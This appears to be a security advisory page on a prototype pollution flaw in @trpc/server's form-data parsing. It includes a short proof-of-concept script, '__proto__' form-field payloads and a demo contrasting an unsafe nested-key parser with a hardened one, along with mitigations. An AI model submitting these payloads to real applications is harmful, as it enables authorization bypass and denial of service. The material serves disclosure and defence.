The vulnerability lies in the `formDataToObject` function of the `@trpc/server` package, which the Next.js App Router adapter uses to turn submitted form data into procedure input objects. The function recursively parses field names written in bracket/dot notation (for example `user[name]` or `user.name`) into nested objects. Its `set` helper does not validate the keys it walks, so dangerous segments such as `__proto__`, `constructor` or `prototype` are accepted like any other key. An attacker can therefore submit FormData whose field names carry such a segment, for example `__proto__[bash]`. During the recursion, `obj[key]` with `key` equal to `__proto__` resolves to `Object.prototype`, and the remaining segments are assigned as properties of the prototype itself rather than of the request object. Because every ordinary object inherits from `Object.prototype`, the injected property then shows up on every object in the application. The impact depends on what code trusts: an authorization check that reads a flag off a user object (for example `if (user.isAdmin)`) can be bypassed, and overwriting methods that core code relies on can crash the process (denial of service).
Platform: @trpc/server
Version: >=10.27.0
Vulnerability: Prototype Pollution
Severity: Critical
Date: N/A
Prediction: Patch TBD
What Undercode Say:
Analytics:
mkdir trpc-vuln-poc
cd trpc-vuln-poc
npm init -y
npm install @trpc/server@<affected version>   # exact version string was lost from the page; see the Version line above
// Node 18+ ships a global FormData; this reproduces the pollution described above.
const { formDataToObject } = require('@trpc/server/unstable-core-do-not-import');
const fd = new FormData();
// Malicious field name: the __proto__ segment redirects the recursive set onto Object.prototype
fd.append('__proto__[bash]', 'true');
const result = formDataToObject(fd);
// On an affected version the property is now visible on an unrelated, freshly created object
console.log(({}).bash);
How Exploit:
Craft malicious FormData.
Submit to tRPC mutation.
Pollute Object.prototype.
Protection from this CVE
Validate input keys: reject `__proto__`, `constructor` and `prototype` as field-name segments before walking into them.
Use safe recursion: only descend into own properties of the object being built, never into inherited ones.
Build the nested containers as null-prototype objects (`Object.create(null)`) so `__proto__` cannot reach `Object.prototype` even if a check is missed.
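To make the failure and the fix concrete, here is an added example (written for this page, not tRPC's own code) of a minimal bracket/dot-notation form-data parser in the unsafe shape the advisory describes, beside a hardened version that applies the three protections above. The function names (`unsafeSet`, `safeSet`, `formDataToObjectUnsafe`, `formDataToObjectSafe`, `isAdminNaive`, `isAdminStrict`) and the FormData payloads are constructed for the demonstration; the `__proto__[isAdmin]` field has the same shape as the `__proto__[bash]` field used earlier. It assumes Node 18+ for the global `FormData`.

```javascript
// Added example, not tRPC's code: unsafe vs. hardened nested-key parser.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// "user[tags][0]" or "user.tags.0" -> ["user", "tags", "0"]
function splitPath(name) {
  return name.split(/[.[\]]+/).filter((part) => part.length > 0);
}

function isObjectLike(v) {
  return typeof v === "object" && v !== null;
}

// Vulnerable helper: no key validation. When a segment is "__proto__",
// cur["__proto__"] resolves to Object.prototype and the walk continues there.
function unsafeSet(obj, path, value) {
  let cur = obj;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    if (!isObjectLike(cur[key])) cur[key] = {};
    cur = cur[key];
  }
  cur[path[path.length - 1]] = value;
}

// Hardened helper: reject dangerous segments, only descend into own
// properties, and use null-prototype containers as defence in depth.
function safeSet(obj, path, value) {
  for (const key of path) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`rejected field segment: ${key}`);
  }
  let cur = obj;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    if (!Object.prototype.hasOwnProperty.call(cur, key) || !isObjectLike(cur[key])) {
      cur[key] = Object.create(null);
    }
    cur = cur[key];
  }
  cur[path[path.length - 1]] = value;
}

function formDataToObjectUnsafe(fd) {
  const out = {};
  for (const [name, value] of fd) unsafeSet(out, splitPath(name), value);
  return out;
}

function formDataToObjectSafe(fd) {
  const out = Object.create(null);
  for (const [name, value] of fd) safeSet(out, splitPath(name), value);
  return out;
}

// Two authorization checks: the naive one reads through the prototype chain
// and is fooled by pollution; the strict one trusts only an own boolean true.
function isAdminNaive(user) {
  return Boolean(user.isAdmin);
}
function isAdminStrict(user) {
  return Object.prototype.hasOwnProperty.call(user, "isAdmin") && user.isAdmin === true;
}

// Constructed malicious request against the vulnerable parser. Removes the
// polluted property afterwards so the rest of the process keeps working.
function demoUnsafe() {
  const fd = new FormData();
  fd.append("__proto__[isAdmin]", "true");
  fd.append("name", "alice");
  const parsed = formDataToObjectUnsafe(fd);
  const unrelated = {}; // created after the request, never touched by it
  const result = {
    ownNameParsed: parsed.name === "alice",
    unrelatedPolluted: unrelated.isAdmin === "true",
    naiveCheckBypassed: isAdminNaive({ role: "user" }),
    strictCheckHolds: !isAdminStrict({ role: "user" }),
  };
  delete Object.prototype.isAdmin;
  return result;
}

// The same request against the hardened parser: rejected, nothing polluted.
function demoSafe() {
  const fd = new FormData();
  fd.append("__proto__[isAdmin]", "true");
  let rejected = false;
  try {
    formDataToObjectSafe(fd);
  } catch (e) {
    rejected = true;
  }
  return { rejected, polluted: ({}).isAdmin !== undefined };
}

// Benign nested input (constructed) still parses with the hardened helper.
function parseBenign() {
  const fd = new FormData();
  fd.append("user[name]", "alice");
  fd.append("user[tags][0]", "a");
  fd.append("user.email", "alice@example.com");
  return formDataToObjectSafe(fd);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demoUnsafe(), demoSafe(), parseBenign());
}
```

Run it with `node` to see the unsafe parser report `unrelatedPolluted: true` and `naiveCheckBypassed: true`, while the hardened parser rejects the request and benign nested fields still come out as expected. Note that `isAdminStrict` alone does not cure the pollution; it only refuses to be fooled by it, which is why the fix belongs in the parser.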
Impact:
Authorization bypass.
Denial of service.
Property injection.
Sources:
Reported By: github.com